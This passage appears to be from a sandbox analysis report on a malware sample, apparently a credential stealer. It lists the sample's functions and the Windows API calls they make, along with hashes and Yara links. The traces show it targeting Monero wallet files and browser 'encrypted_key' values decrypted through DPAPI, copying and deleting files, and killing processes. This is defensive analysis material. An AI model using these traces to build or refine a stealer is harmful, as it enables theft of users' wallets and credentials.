                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0086A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0086A6BC
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0086A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 03642b20d8a9ac2fab6ea88a4f0e0cb3693c12b5c03627b583e3b47b26d13d49
                        • Instruction ID: 7e2dfa99d3d8ed8e6527201882c0724b9ed9b69c0196d13c34a6ed844ad134e4
                        • Opcode Fuzzy Hash: 03642b20d8a9ac2fab6ea88a4f0e0cb3693c12b5c03627b583e3b47b26d13d49
                        • Instruction Fuzzy Hash: 61E1A2728101189ADB09EBA8DC95EEE7378FF54300F50C169F52AF6095DF34AA49CB63
                        Function 0086D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086D481
                        • lstrlen.KERNEL32(00000000), ref: 0086D698
                        • lstrlen.KERNEL32(00000000), ref: 0086D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0086D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 72c967d1c4d7026020c0da8553a1be115e10f0b6400cd3349e0c1f6ce03735b6
                        • Instruction ID: ddcf464b7e94e2487854ffea3d97d9e0f648f955c433a6a85d743ff64841c17f
                        • Opcode Fuzzy Hash: 72c967d1c4d7026020c0da8553a1be115e10f0b6400cd3349e0c1f6ce03735b6
                        • Instruction Fuzzy Hash: EF91F4719101149ADB08FBA8DC96EEE7338FF54300F508169F52BE6095EF34AA49CB63
                        Function 0086D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086D801
                        • lstrlen.KERNEL32(00000000), ref: 0086D99F
                        • lstrlen.KERNEL32(00000000), ref: 0086D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0086DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: fa2d43aa0e42f26b63b2ca2cd1aaf925ae001835106e2add4a2830f3d20c7ebe
                        • Instruction ID: efb17ec0b34c6c921c0770876452452f8d29ce6eebf07960dbcc4963cf9886ea
                        • Opcode Fuzzy Hash: fa2d43aa0e42f26b63b2ca2cd1aaf925ae001835106e2add4a2830f3d20c7ebe
                        • Instruction Fuzzy Hash: F781E4719101149ACB08FBA8DD95EEE7378FF94300F508529F52AE6095EF34AA09CB63
                        Function 00873560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 1dd0b870ebbc502010063065f9ee83a00cff447b24414579a8b8bbbfaaaedfba
                        • Instruction ID: 4637a240a1da6decc0dd666ffff9c0c12490d834e731d6770182e783e7ed1813
                        • Opcode Fuzzy Hash: 1dd0b870ebbc502010063065f9ee83a00cff447b24414579a8b8bbbfaaaedfba
                        • Instruction Fuzzy Hash: 7C411F71D10109ABCB08EFE8D845AEEB774FB54704F00C428E52AA6295DB75AA09DF93
                        Function 00869CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00869D39
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869AEF
                          • Part of subcall function 00869AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00864EEE,00000000,?), ref: 00869B01
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869B2A
                          • Part of subcall function 00869AC0: LocalFree.KERNEL32(?,?,?,?,00864EEE,00000000,?), ref: 00869B3F
                          • Part of subcall function 00869B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00869B84
                          • Part of subcall function 00869B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00869BA3
                          • Part of subcall function 00869B60: LocalFree.KERNEL32(?), ref: 00869BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 30a44a4fa29e06cb243c5177575caf41ce3f13b7144dae583dcb33add2dd91f6
                        • Instruction ID: 99335bd2e40befd39f89e3a011d0988c338113f859db4bf36384d1749ff1f0e0
                        • Opcode Fuzzy Hash: 30a44a4fa29e06cb243c5177575caf41ce3f13b7144dae583dcb33add2dd91f6
                        • Instruction Fuzzy Hash: 163112B5D10109ABCF04DBE8DC85AEFB7BCFB48304F154529E955E7281EB349A05CBA1
                        Function 008794D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 008794EB
                          • Part of subcall function 00878D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0087951E,00000000), ref: 00878D5B
                          • Part of subcall function 00878D50: RtlAllocateHeap.NTDLL(00000000), ref: 00878D62
                          • Part of subcall function 00878D50: wsprintfW.USER32 ref: 00878D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 008795AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 008795C9
                        • CloseHandle.KERNEL32(00000000), ref: 008795D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: f2a19ed0cee327324880ebb23c273efe5fc279a004209b4a3358ca9f2b2b6eb5
                        • Instruction ID: c92f3870885de1d1d30f86b8d9a2a081db7e36521973627f65ef5df37a7a7288
                        • Opcode Fuzzy Hash: f2a19ed0cee327324880ebb23c273efe5fc279a004209b4a3358ca9f2b2b6eb5
                        • Instruction Fuzzy Hash: 2E310C71A0021C9FDB14DFD4CD89BEDB7B8FB59700F108459E50AAB188DB74AA89CB52
                        Function 008792E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00873AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00873AEE,?), ref: 008792FC
                        • GetFileSizeEx.KERNEL32(000000FF,00873AEE), ref: 00879319
                        • CloseHandle.KERNEL32(000000FF), ref: 00879327
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: d700ced01e987019b64f62c3b541f8d634bc034214b9f58152b43361bde30a87
                        • Instruction ID: ecb15aba6eee0ffb3dc31b384fc9c59831770469808aef2dcd32655a6ef74802
                        • Opcode Fuzzy Hash: d700ced01e987019b64f62c3b541f8d634bc034214b9f58152b43361bde30a87
                        • Instruction Fuzzy Hash: 68F01935E40209ABDB10DBE0DC49BAE77F9EB58750F10C254F655E72D4D77496018B40
                        Function 0087C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 0087C74E
                          • Part of subcall function 0087BF9F: __amsg_exit.LIBCMT ref: 0087BFAF
                        • __getptd.LIBCMT ref: 0087C765
                        • __amsg_exit.LIBCMT ref: 0087C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0087C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 7c5133266ac7c7ddd4cf82bbf2569ba891b5c64a0bc588005da80f357e870ba0
                        • Instruction ID: d75c9b472fd0b5b68020738e703b39d61a52bfef14cd8d229d57ff3e6ed4cc1f
                        • Opcode Fuzzy Hash: 7c5133266ac7c7ddd4cf82bbf2569ba891b5c64a0bc588005da80f357e870ba0
                        • Instruction Fuzzy Hash: F6F044329016109AD728BBBC9846B4E33A1FB40B60F24C14DF41CE72EACF68D9409A57
                        Function 00874F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00874F7A
                        • lstrcat.KERNEL32(?,00881070), ref: 00874F97
                        • lstrcat.KERNEL32(?,01169658), ref: 00874FAB
                        • lstrcat.KERNEL32(?,00881074), ref: 00874FBD
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 0087492C
                          • Part of subcall function 00874910: FindFirstFileA.KERNEL32(?,?), ref: 00874943
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FDC), ref: 00874971
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FE0), ref: 00874987
                          • Part of subcall function 00874910: FindNextFileA.KERNEL32(000000FF,?), ref: 00874B7D
                          • Part of subcall function 00874910: FindClose.KERNEL32(000000FF), ref: 00874B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: cd0cb829e5e92dfdc320906cd1af332837e4469b18a07cdf7fddb13da92271f6
                        • Instruction ID: 5000d4a5e19a3fe95f83ce8a64d73156524466430b933869d823017eff0352ba
                        • Opcode Fuzzy Hash: cd0cb829e5e92dfdc320906cd1af332837e4469b18a07cdf7fddb13da92271f6
                        • Instruction Fuzzy Hash: CA21A376900205A7CB94FBA4DC4AEED737CF769300F004554B65AD2185EF749AC9CB93